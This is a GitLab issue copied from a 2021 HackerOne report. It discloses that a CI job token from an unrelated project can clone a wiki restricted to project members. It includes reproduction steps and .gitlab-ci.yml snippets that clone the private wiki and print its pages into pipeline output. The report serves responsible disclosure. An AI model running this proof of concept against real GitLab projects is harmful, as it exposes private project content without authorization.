Backend: Able to git the wiki despite of the Only Project Members setting

HackerOne report #1075586 by shells3c on 2021-01-10, assigned to @rchan-gitlab:

Report

Summary

There was a problem by mistake while confirming the patch for the Wiki bug in the past report: #887755, and the fact that the bug is still there! I am able to git private wiki using the CI_JOB_TOKEN (public project)

Steps to reproduce

Create a project, set the Wiki visibility to Only Project Members in the setting page: https://gitlab.com/<user>/<project>/edit
Login as another user (attacker), create .gitlab-ci.yml in an arbitrary project:

stages:      
  - steal  
test:      
  stage: steal  
  script:      
    - &#39;git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/company/api.wiki.git&#39;  
    - &#39;cd api.wiki &amp;&amp; cat api-doc.md&#39;

In the pipeline output, you will able to read the content

Examples

Can't access this: https://gitlab.com/just4hack2/mypro/-/wikis/home
Try adding the following in your .gitlab-ci.yml and read the wiki:

stages:      
  - steal  
test:      
  stage: steal  
  script:      
    - &#39;git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/just4hack2/mypro.wiki.git&#39;  
    - &#39;cd api.wiki&#39;  
    - &#39;ls&#39;  
    - &#39;cat home.md&#39;

Impact

Able to read the private Wiki of Gitlab projects

How To Reproduce

Please add reproducibility information to this section:

Edited Apr 14, 2022 by Mark Nuzzo